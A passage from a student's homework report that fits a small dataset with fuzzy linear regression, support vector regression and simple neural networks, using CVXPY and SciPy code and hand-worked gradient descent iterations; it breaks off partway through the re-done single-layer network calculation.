As in HW2, the optimization problem has been formulated as below. Here I pick the threshold $\alpha$ as $0.5$ for the spread calculation. Similar to Q1, the estimate of $A_1$ (the slope) is 1 and $A_0$ (the intercept) is 0. The spreads of $A_1$ and $A_0$ have both been calculated. As expected, both spreads are 0: the regression line fits the training data perfectly, so no spread is needed to cover errors between the estimates $\hat{y}$ and the true values $y$.
The fitted line is plotted over the training set as well.
```
# Define threshold h (same meaning as the alpha in an alpha-cut). The higher h, the wider the spread.
h = 0.5
# Define and solve the CVXPY problem.
c = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1
alpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1
cost = cp.sum(X_lp * c) # define cost function
obj = cp.Minimize(cost) # define objective function
constraints = [c >= 0,
y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp
-y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe center of A1 (slope) is:", alpha.value[1],
"\nThe spread of A1 (slope) is:", c.value[1],
"\nThe center of A0 (intercept) is:", alpha.value[0],
"\nThe spread of A0 (intercept) is:", c.value[0])
x = np.linspace(0, 10, 100)
y = alpha.value[1] * x + alpha.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = A1x + A0')
plt.title('Fitted line using Fuzzy LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
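The same fuzzy-regression LP can also be solved without CPLEX. Below is a sketch using SciPy's `linprog` (assuming SciPy is installed); the variable order `[c0, c1, a0, a1]` and the threshold h = 0.5 mirror the CVXPY formulation above:

```python
import numpy as np
from scipy.optimize import linprog

xs = np.arange(1.0, 7.0)
ys = xs.copy()                      # training data lies exactly on y = x
k = 1 - 0.5                         # (1 - h) with threshold h = 0.5

# Minimize total spread: sum_i (c0 + c1*x_i); variables are [c0, c1, a0, a1]
obj = [len(xs), xs.sum(), 0.0, 0.0]

A_ub, b_ub = [], []
for x, y in zip(xs, ys):
    # y <= k*(c0 + c1*x) + a0 + a1*x   rewritten as   -k*c0 - k*x*c1 - a0 - x*a1 <= -y
    A_ub.append([-k, -k * x, -1.0, -x]); b_ub.append(-y)
    # a0 + a1*x - k*(c0 + c1*x) <= y   rewritten as   -k*c0 - k*x*c1 + a0 + x*a1 <= y
    A_ub.append([-k, -k * x, 1.0, x]); b_ub.append(y)

res = linprog(obj, A_ub=A_ub, b_ub=b_ub,
              bounds=[(0, None), (0, None), (None, None), (None, None)],
              method="highs")
c0, c1, a0, a1 = res.x
print("centers A0, A1 =", a0, a1, "; spreads =", c0, c1)
```

Because the spreads are constrained nonnegative and the objective is their weighted sum, an objective value of 0 certifies the perfect-fit solution $A_1=1$, $A_0=0$ with zero spreads.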
## Q3 Support Vector Regression
In the course lecture, it was mentioned that the objective of SVR is to ***minimize the sum of squares while seeking flatness of the hyperplane.*** In $\epsilon$-SV regression, our goal is to find a function $f(x)$ that has at most $\epsilon$ deviation from the actually obtained targets $y_i$ for all the training data, and that is at the same time as flat as possible. Flatness in this case means seeking a small $w$, and the approach here is to minimize its L2 norm. The problem can be written as a convex optimization problem:

Sometimes the convex optimization problem is infeasible, and we may also want to allow for some errors. Analogously to the "soft margin" loss in SVM, we introduce slack variables $\xi_i$, $\xi_i^*$ to cope with otherwise infeasible constraints of the optimization problem:

Here the constant $C>0$ determines the trade-off between the flatness of $f(x)$ and the amount up to which deviations larger than $\epsilon$ are tolerated. The optimization problem is formulated with slack variables, and in the program below I define $C$ as $\frac{1}{N}$, where $N=6$ is the number of observations in the training set. The $\epsilon$ here has been set to 0.
From the output below, the estimated $w$ is very close to 1 and $b$ is very close to 0.
```
# The constant C defines the trade-off between the flatness of f and the amount up to which deviations larger than ε are tolerated.
# Larger C penalizes deviations more heavily. Here C is defined as 1/N, where N is the # of observations.
C = 1 / len(ar[1])
epsilon = 0 # For this ε-SVR problem set ε=0
# Define and solve the CVXPY problem.
bw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w
epsilon1 = cp.Variable(X_lp.shape[0]) # for slack variables ξi
epsilon2 = cp.Variable(X_lp.shape[0]) # for slack variables ξ*i
cost = 1 / 2 * bw[1] ** 2 + C * cp.sum(epsilon1 + epsilon2) # define cost function
obj = cp.Minimize(cost) # define objective function
constraints = [epsilon1 >= 0,
epsilon2 >= 0,
y_lp <= X_lp * bw + epsilon + epsilon1,
-y_lp <= -(X_lp * bw) + epsilon + epsilon2]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe estimate of w is:", bw.value[1],
"\nThe estimate of b is:", bw.value[0], )
```
The fitted line is plotted over the training set as well:
```
x = np.linspace(0, 10, 100)
y = bw.value[1] * x + bw.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = wx + b')
plt.title('Fitted line using SVR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
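As an independent sanity check: with $\epsilon=0$, minimizing over the slack variables makes the primal equivalent to minimizing $\frac{1}{2}w^2 + C\sum_i|y_i-(wx_i+b)|$, which can be attacked directly with a derivative-free optimizer. A sketch assuming SciPy is available (Nelder–Mead copes with the non-smooth absolute values on this small problem):

```python
import numpy as np
from scipy.optimize import minimize

xs = np.arange(1.0, 7.0)
ys = xs.copy()
C = 1 / len(xs)                     # same trade-off constant as above

def svr_primal(params):
    b, w = params
    # With epsilon = 0, every residual is penalized linearly (epsilon-insensitive -> L1)
    return 0.5 * w ** 2 + C * np.sum(np.abs(ys - (w * xs + b)))

res = minimize(svr_primal, x0=[0.0, 0.0], method="Nelder-Mead",
               options={"xatol": 1e-8, "fatol": 1e-8,
                        "maxiter": 2000, "maxfev": 4000})
b_hat, w_hat = res.x
print("w ≈", w_hat, ", b ≈", b_hat)
```

The true minimizer sits at $w=1$, $b=0$ (where all residuals vanish and the flatness penalty alone remains), agreeing with the CPLEX output.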
## Q4 Single-layer NN
### First two iterations illustration
From the NN architecture on Lecture 7, page 13, the network output $a$ can be denoted as:
$$a=f(x)=f(wp+b)$$
where
$$x=wp+b\quad f(x)=5x\quad \frac{\partial f}{\partial x}=5$$
Since $b=1$,
$$a=f(x)=f(wp+b)=5(wp+1)$$
Set the loss function $E$ as:
$$ E=\sum_{i=1}^N \frac{1}{2}(T_i-a_i)^2 $$
where $T_i$ is the target value for each input $i$ and $N$ is the number of observations in the training set.
We can find the gradient for $w$ by:
$$\frac{\partial E}{\partial w}=\frac{\partial E}{\partial a}\frac{\partial a}{\partial x}\frac{\partial x}{\partial w}$$
**For the 1st iteration**, with initial value $w=10$:
$$
\frac{\partial E}{\partial a}=a-T=5(wp_i+1)-T_i\\
\frac{\partial f}{\partial x}=5$$
$$\frac{\partial x_1}{\partial w}=p_1=1$$
$$\vdots$$
$$\frac{\partial x_6}{\partial w}=p_6=6$$
For $i=1$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*1+1)-1=54\\
\frac{\partial E}{\partial w}=54*5*1$$
For $i=2$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-2=103\\
\frac{\partial E}{\partial w}=103*5*2$$
For $i=3$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-3=152\\
\frac{\partial E}{\partial w}=152*5*3$$
For $i=4$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*4+1)-4=201\\
\frac{\partial E}{\partial w}=201*5*4$$
For $i=5$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*5+1)-5=250\\
\frac{\partial E}{\partial w}=250*5*5$$
For $i=6$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*6+1)-6=299\\
\frac{\partial E}{\partial w}=299*5*6$$
The sum of gradients for the batch update is:
$$\sum_{i}(\frac{\partial E}{\partial w})=(54*1+103*2+152*3+201*4+250*5+299*6)*5=22820
$$
Averaging over $N=6$ and multiplying by the learning rate (0.1) gives the step size:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w})}{N}=380.333
$$
The new $w$ and output $a$ are:
$$w=10-380.333=-370.333\\
a=[-1846.667,-3698.333,-5550,-7401.667,-9253.333, -11105]
$$
**For the 2nd iteration:**
For $i=1$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*1+1)-1=-1847.667\\
\frac{\partial E}{\partial w}=-1847.667*5*1$$
For $i=2$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*2+1)-2=-3700.333\\
\frac{\partial E}{\partial w}=-3700.333*5*2$$
For $i=3$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*3+1)-3=-5553\\
\frac{\partial E}{\partial w}=-5553*5*3$$
For $i=4$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*4+1)-4=-7405.667\\
\frac{\partial E}{\partial w}=-7405.667*5*4$$
For $i=5$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*5+1)-5=-9258.333\\
\frac{\partial E}{\partial w}=-9258.333*5*5$$
For $i=6$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*6+1)-6=-11111\\
\frac{\partial E}{\partial w}=-11111*5*6$$
The sum of gradients for the batch update is:
$$\sum_{i}(\frac{\partial E}{\partial w})=(-1847.667*1-3700.333*2-5553*3-7405.667*4-9258.333*5-11111*6)*5=-842438.333
$$
Averaging over $N=6$ and multiplying by the learning rate (0.1) gives the step size:
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w})}{N}=-14040.639
$$
The new $w$ and output $a$ are:
$$w=-370.333-(-14040.639)=13670.306\\
a=[68356.528, 136708.056, 205059.583, 273411.111, 341762.639, 410114.167]
$$
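The two hand iterations above can be reproduced in a few lines of NumPy (same batch rule, $w \leftarrow w - 0.1 \cdot$ mean of the per-sample gradients); this is just a numerical check of the arithmetic:

```python
import numpy as np

p = np.arange(1.0, 7.0)   # inputs p_i
T = p.copy()              # targets T_i
w, lr = 10.0, 0.1

for it in (1, 2):
    grad = (5 * (w * p + 1) - T) * 5 * p          # per-sample dE/dw
    print(f"iteration {it}: sum of gradients = {grad.sum():.3f}, "
          f"step = {lr * grad.mean():.3f}")
    w -= lr * grad.mean()
    print("  new w =", round(w, 3))
```

The printed gradient sums (22820 and −842438.333) match the hand calculation, and the weight swings from −370.333 to +13670.306, showing the oscillation.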
### Code
**We can tell from the above that over the first 2 iterations, the updated output $a$ moves farther and farther from the actual values. This is because the learning rate of 0.1 is too large: the weight oscillates and the algorithm cannot converge.** Q7 explores a proper learning rate for this case.
From the code below, the loss keeps growing over 30 iterations and never converges, which confirms this finding.
```
def single_layer_NN(lr, w, maxiteration):
"""lr - learning rate\n
w - initial value of w\n
maxiteration - define # of max iteration """
E0 = sum(0.5 * np.power((y_lp - 5 * (w * X_lp[:, 1] + 1)), 2)) # initialize Loss, before 1st iteration
for i in range(maxiteration):
if i > 0: # Starting 2nd iteration, E1 value give to E0
E0 = E1 # Loss before iteration
print("Iteration=", i, ",", "Loss value=", E0)
gradient = np.mean((5 * (w * X_lp[:, 1] + 1) - y_lp) * 5 * X_lp[:, 1]) # calculate gradient
step = gradient * lr # calculate step size
w = w - step # refresh the weight
E1 = sum(0.5 * np.power((5 * (w * X_lp[:, 1] + 1) - y_lp), 2)) # Loss after iteration
a = 5 * (w * X_lp[:, 1] + 1) # the refreshed output
if abs(E0 - E1) <= 0.0001:
print('Break out of the loop and end at Iteration=', i,
'\nThe value of loss is:', E1,
'\nThe value of w is:', w)
break
return w, a, gradient
w, a, gradient = single_layer_NN(lr=0.1, w=10, maxiteration=30)
```
## Q5 Two-layer NN
### First two iterations illustration

The above structure will be used to model Q5, with $b_1=b_2=1$ and initial values $w_1=w_2=10$. For $f_1$, the activation function is the sigmoid. Since the sample data implies a linear relationship, a linear activation function (specifically, the **identity activation function**) has been chosen for $f_2$. The loss function $E$ is the same as in Q4:
$$
E=\sum_{i=1}^N \frac{1}{2}(T_i-a_2)^2
$$
where $T_i$ is the target value for each input $i$ and $N$ is the number of observations in the training set.
The output $a_1$ and $a_2$ can be denoted as:
$$
a_1=f_1(w_1p+b) \quad a_2=f_2(w_2a_1+b)
$$
where
$$
f_1(x)=\frac{1}{1+e^{-x}} \quad \frac{\partial f_1}{\partial x}=f_1(1-f_1)\\
and \quad f_2(x)=x \quad \frac{\partial f_2}{\partial x}=1
$$
We can find the gradient for $w_1$ and $w_2$ by:
$$
\frac{\partial E}{\partial w_2}=\frac{\partial E}{\partial a_2}\frac{\partial a_2}{\partial n_2}\frac{\partial n_2}{\partial w_2}=(w_2a_1+b-T)*1*a_1=(w_2a_1+1-T)a_1
\\
\frac{\partial E}{\partial w_1}=\frac{\partial E}{\partial a_2}\frac{\partial a_2}{\partial a_1}\frac{\partial a_1}{\partial n_1}\frac{\partial n_1}{\partial w_1}=(w_2a_1+b-T)*w_2*a_1(1-a_1)*p\\=\frac{\partial E}{\partial w_2}*w_2*(1-a_1)*p
$$
where
$$
a_1=f_1(w_1p+b)=\frac{1}{1+e^{-(w_1p+1)}}
$$
**We can see that the gradient of $w_1$ can be calculated from the gradient of $w_2$, and the gradients of both weights ($w_1$ and $w_2$) depend only on the inputs and the current values of the weights!**
**For the 1st iteration**,
$$
For\quad i=1, 2, 3, 4, 5, 6, \quad a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1\\
$$
For $i=1:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-1=10\\
\frac{\partial E}{\partial w_2}=10*1*1=10,\quad \frac{\partial E}{\partial w_1}=10*10*(1-1)*1=0
$$
For $i=2:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-2=9\\
\frac{\partial E}{\partial w_2}=9*1*1=9,\quad \frac{\partial E}{\partial w_1}=9*10*(1-1)*1=0
$$
For $i=3:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\
\frac{\partial E}{\partial w_2}=8*1*1=8,\quad \frac{\partial E}{\partial w_1}=8*10*(1-1)*1=0
$$
For $i=4:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\
\frac{\partial E}{\partial w_2}=7*1*1=7,\quad \frac{\partial E}{\partial w_1}=7*10*(1-1)*1=0
$$
For $i=5:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-5=6\\
\frac{\partial E}{\partial w_2}=6*1*1=6,\quad \frac{\partial E}{\partial w_1}=6*10*(1-1)*1=0
$$
For $i=6:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-6=5\\
\frac{\partial E}{\partial w_2}=5*1*1=5,\quad \frac{\partial E}{\partial w_1}=5*10*(1-1)*1=0
$$
The sums of gradients for the batch update are:
$$\sum_{i}(\frac{\partial E}{\partial w_1})=0$$
$$\sum_{i}(\frac{\partial E}{\partial w_2})=10+9+8+7+6+5=45$$
Averaging over $N=6$ and multiplying by the learning rate (0.1) gives the step sizes:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_1})}{N}=0$$
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_2})}{N}=0.75$$
The new weights $w_1$, $w_2$ and outputs $a_1$, $a_2$ are calculated below; the values of $a_1$ and $a_2$ are the same for all 6 observations.
$$
w_1=w_1-s_1=10-0=10,\\
w_2=w_2-s_2=10-0.75=9.25\\
a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1, \quad i\in [1,2,3,4,5,6]\\
a_2=w_2a_1+b=9.25*1+1=10.25
$$
**For the 2nd iteration**,
$$
For\quad i=1, 2, 3, 4, 5, 6, \quad a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1\\
$$
For $i=1:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-1=9.25\\
\frac{\partial E}{\partial w_2}=9.25*1*1=9.25,\quad \frac{\partial E}{\partial w_1}=9.25*9.25*(1-1)*1=0
$$
For $i=2:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-2=8.25\\
\frac{\partial E}{\partial w_2}=8.25*1*1=8.25,\quad \frac{\partial E}{\partial w_1}=8.25*9.25*(1-1)*1=0
$$
For $i=3:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-3=7.25\\
\frac{\partial E}{\partial w_2}=7.25*1*1=7.25,\quad \frac{\partial E}{\partial w_1}=7.25*9.25*(1-1)*1=0
$$
For $i=4:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-4=6.25\\
\frac{\partial E}{\partial w_2}=6.25*1*1=6.25,\quad \frac{\partial E}{\partial w_1}=6.25*9.25*(1-1)*1=0
$$
For $i=5:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-5=5.25\\
\frac{\partial E}{\partial w_2}=5.25*1*1=5.25,\quad \frac{\partial E}{\partial w_1}=5.25*9.25*(1-1)*1=0
$$
For $i=6:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-6=4.25\\
\frac{\partial E}{\partial w_2}=4.25*1*1=4.25,\quad \frac{\partial E}{\partial w_1}=4.25*9.25*(1-1)*1=0
$$
The sums of gradients for the batch update are:
$$\sum_{i}(\frac{\partial E}{\partial w_1})=0$$
$$\sum_{i}(\frac{\partial E}{\partial w_2})=9.25+8.25+7.25+6.25+5.25+4.25=40.5$$
Averaging over $N=6$ and multiplying by the learning rate (0.1) gives the step sizes:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_1})}{N}=0$$
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_2})}{N}=0.675$$
The new weights $w_1$, $w_2$ and outputs $a_1$, $a_2$ are calculated below; the values of $a_1$ and $a_2$ are the same for all 6 observations:
$$
w_1=w_1-s_1=10-0=10,\\
w_2=w_2-s_2=9.25-0.675=8.575\\
a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1, \quad i\in [1,2,3,4,5,6]\\
a_2=w_2a_1+b=8.575*1+1=9.575
$$
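The two iterations can be checked numerically as well; because the sigmoid saturates to $\approx 1$ for every input, $w_1$'s gradient is essentially zero, exactly as derived above:

```python
import numpy as np

p = np.arange(1.0, 7.0)
T = p.copy()
w1, w2, b, lr = 10.0, 10.0, 1.0, 0.1

for it in (1, 2):
    a1 = 1 / (1 + np.exp(-(w1 * p + b)))              # hidden sigmoid output (~1 here)
    a2 = w2 * a1 + b                                  # identity output layer
    g2 = np.mean((a2 - T) * a1)                       # batch-averaged dE/dw2
    g1 = np.mean((a2 - T) * w2 * a1 * (1 - a1) * p)   # dE/dw1 via backpropagation
    w1 -= lr * g1
    w2 -= lr * g2
    print(f"iteration {it}: w1 = {w1:.6f}, w2 = {w2:.4f}")
```

Up to the tiny deviation of the sigmoid from 1, this reproduces $w_2=9.25$ after the first update and $8.575$ after the second, with $w_1$ essentially staying at 10.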
### Code
Below is the code to estimate all weights using batch training, with the stopping criterion being a change in the loss function of less than 0.0001. The iterations stop at Iteration 62, with $w_1=10$ and $w_2=2.511$; $w_1$ hardly changes throughout. The output of the first 60 iterations is suppressed to keep the report concise.
```
def linear_activation_NN(C, lr, w1, w2, maxiteration):
# C - set the slope of the f2: f2(x)=Cx
# lr - learning rate
# w1 - initial value of w1
# w2 - initial value of w2
# maxiteration - define # of max iteration
a1 = 1 / (1 + np.exp(-(w1 * X_lp[:, 1] + 1))) # initialize output1 - a1
a2 = C * (w2 * a1 + 1) # initialize output2 - a2
E0 = sum(0.5 * np.power(y_lp - a2, 2)) # initialize Loss, before 1st iteration
for i in range(maxiteration):
if i > 0: # Starting 2nd iteration, E1 value will give to E0
E0 = E1 # Loss before iteration
# print("Iteration=", i, ",", "Loss value=", E0)
gradient_2 = np.mean((w2 * a1 + 1 - y_lp) * C * a1) # calculate gradient for w2
gradient_1 = np.mean(
(w2 * a1 + 1 - y_lp) * C * w2 * a1 * (1 - a1) * X_lp[:, 1]) # use BP to calculate gradient for w1
# gradient_1 = np.mean(gradient_2 * w2 * (1 - a1) * X_lp[:, 1])
step_1 = gradient_1 * lr # calculate step size
step_2 = gradient_2 * lr
w1 = w1 - step_1 # refresh w1
w2 = w2 - step_2 # refresh w2
a1 = 1 / (1 + np.exp(-(w1 * X_lp[:, 1] + 1))) # refresh a1
a2 = C * (w2 * a1 + 1) # refresh a2
E1 = sum(0.5 * np.power(y_lp - a2, 2)) # Loss after iteration
if abs(E0 - E1) <= 0.0001:
print('Break out of the loop and the iteration converge at Iteration=', i,
'\nThe value of loss is:', E1,
'\nThe value of w1 is:', w1,
'\nThe value of w2 is:', w2)
break
return w1, w2, a1, a2, gradient_1, gradient_2
w1, w2, a1, a2, gradient_1, gradient_2 = linear_activation_NN(C=1, lr=0.1, w1=10, w2=10, maxiteration=100)
```
Below is a plot of how the NN model fits the current sample data points.
```
# plot the fit
x = np.linspace(-4, 10, 100)
y = w2 * (1 / (1 + np.exp(-(w1 * x + 1)))) + 1
# plt.close('all')
plt.plot(x, y, c='red', label='y = f(w2 * a1 + b)')
plt.title('Fitted line using two-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.xlim((-5, 8))
plt.ylim((-2, 8))
plt.xlabel('x')
plt.ylabel('y')
plt.show()
```
## Q6 Re-do Q1-Q5
Two additional observations, (2, 3) and (3, 4), are added; the scatterplot below shows the resulting data sample.
```
ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6, 2, 3], # x
[1, 2, 3, 4, 5, 6, 3, 4]]) # y
# plot the dot points
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.title('Visualization of training observations')
plt.axis('scaled')
plt.show()
```
### Simple Linear Regression
A simple linear regression fit analogous to Q1 has been conducted below. The estimated slope is $0.923$ and the estimated intercept is $0.5$.
```
# Data preprocessing
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
# Define and solve the CVXPY problem.
beta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total
cost = cp.sum_squares(X_lp * beta - y_lp) # define cost function
obj = cp.Minimize(cost) # define objective function
prob = cp.Problem(obj)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe estimate of a (slope) is:", beta.value[1],
      "\nThe estimate of b (intercept) is:", beta.value[0])
```
The regression line has been plotted:
```
# Plot the fit
x = np.linspace(0, 10, 100)
y = beta.value[1] * x + beta.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = ax + b')
plt.title('Fitted line using simple LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
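The reported values match the closed-form OLS solution for the 8-point sample; a quick check with NumPy's normal equations:

```python
import numpy as np

x = np.array([1, 2, 3, 4, 5, 6, 2, 3], dtype=float)
y = np.array([1, 2, 3, 4, 5, 6, 3, 4], dtype=float)

# Simple-regression normal equations: slope = cov(x, y) / var(x)
slope = ((x * y).mean() - x.mean() * y.mean()) / ((x ** 2).mean() - x.mean() ** 2)
intercept = y.mean() - slope * x.mean()
print("slope =", slope, ", intercept =", intercept)   # 12/13 ≈ 0.923 and 0.5
```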
### Fuzzy Linear Regression
A fuzzy linear regression fit analogous to Q2 has been conducted below. We can see that some spread is estimated for the intercept $A_0$: the line can no longer fit the data perfectly, so spread is needed to cover the data points around the regression line.
```
# Define threshold h (same meaning as the alpha in an alpha-cut). The higher h, the wider the spread.
h = 0.5
# Define and solve the CVXPY problem.
c = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1
alpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1
cost = cp.sum(X_lp * c) # define cost function
obj = cp.Minimize(cost) # define objective function
constraints = [c >= 0,
y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp
-y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe center of A1 (slope) is:", alpha.value[1],
"\nThe spread of A1 (slope) is:", c.value[1],
"\nThe center of A0 (intercept) is:", alpha.value[0],
"\nThe spread of A0 (intercept) is:", c.value[0])
```
The regression line has been plotted, along with the fuzzy spread.
```
x = np.linspace(0, 10, 100)
y = alpha.value[1] * x + alpha.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = A1x + A0')
y = (alpha.value[1] + c.value[1]) * x + alpha.value[0] + c.value[0]
plt.plot(x, y, '--g', label='Fuzzy Spread')
y = (alpha.value[1] - c.value[1]) * x + alpha.value[0] - c.value[0]
plt.plot(x, y, '--g')
plt.title('Fitted line using Fuzzy LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Support Vector Regression
A support vector regression fit analogous to Q3 has been conducted below. Here a simpler version of SVR is used, with $\epsilon$ set to 1:
$$
minimize \quad \frac{1}{2}||w||^2$$
$$
subject\; to\left\{
\begin{aligned}
y_i-(w \cdot x_i)-b\le\epsilon\\
(w \cdot x_i)+b-y_i\le\epsilon\\
\end{aligned}
\right.
$$
The fitted line and the hard margin ($\epsilon$-tube) have been plotted over the training set as well. The estimated $w=0.6$ and $b=1.4$.
```
# A simplified version without introducing the slack variables ξi and ξ*i
epsilon = 1
bw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w
cost = 1 / 2 * bw[1] ** 2
obj = cp.Minimize(cost)
constraints = [
y_lp <= X_lp * bw + epsilon,
-y_lp <= -(X_lp * bw) + epsilon]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe estimate of w is:", bw.value[1],
"\nThe estimate of b is:", bw.value[0], )
upper = X_lp[:, 1] * bw.value[1] + bw.value[0] + epsilon # upper bound of the margin
lower = X_lp[:, 1] * bw.value[1] + bw.value[0] - epsilon # lower bound of the margin
plt.close('all')
x = np.linspace(.5, 6, 100)
y = bw.value[1] * x + bw.value[0]
plt.plot(x, y, c='red', label='y = wx + b')
x = [[min(X_lp[:, 1]), max(X_lp[:, 1])]]
y = [[min(lower), max(lower)]]
for i in range(len(x)):
plt.plot(x[i], y[i], '--g')
y = [[min(upper), max(upper)]]
for i in range(len(x)):
plt.plot(x[i], y[i], '--g', label='margin')
plt.title('Fitted line using SVR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Single-layer NN
#### First two iterations illustration
Similar to Q4:
**For the 1st iteration**, with initial value $w=10$:
$$
\frac{\partial E}{\partial a}=a-T=5(wp_i+1)-T_i\\
\frac{\partial f}{\partial x}=5$$
$$\frac{\partial x_1}{\partial w}=p_1=1$$
$$\vdots$$
$$\frac{\partial x_6}{\partial w}=p_6=6$$
$$\frac{\partial x_7}{\partial w}=p_7=2$$
$$\frac{\partial x_8}{\partial w}=p_8=3$$
For $i=1$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*1+1)-1=54\\
\frac{\partial E}{\partial w}=54*5*1$$
For $i=2$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-2=103\\
\frac{\partial E}{\partial w}=103*5*2$$
For $i=3$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-3=152\\
\frac{\partial E}{\partial w}=152*5*3$$
For $i=4$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*4+1)-4=201\\
\frac{\partial E}{\partial w}=201*5*4$$
For $i=5$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*5+1)-5=250\\
\frac{\partial E}{\partial w}=250*5*5$$
For $i=6$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*6+1)-6=299\\
\frac{\partial E}{\partial w}=299*5*6$$
For $i=7$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-3=102\\
\frac{\partial E}{\partial w}=102*5*2$$
For $i=8$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-4=151\\
\frac{\partial E}{\partial w}=151*5*3$$
The sum of gradients for the batch update is:
$$\sum_{i}(\frac{\partial E}{\partial w})=26105
$$
Averaging over $N=8$ and multiplying by the learning rate (0.1) gives the step size:
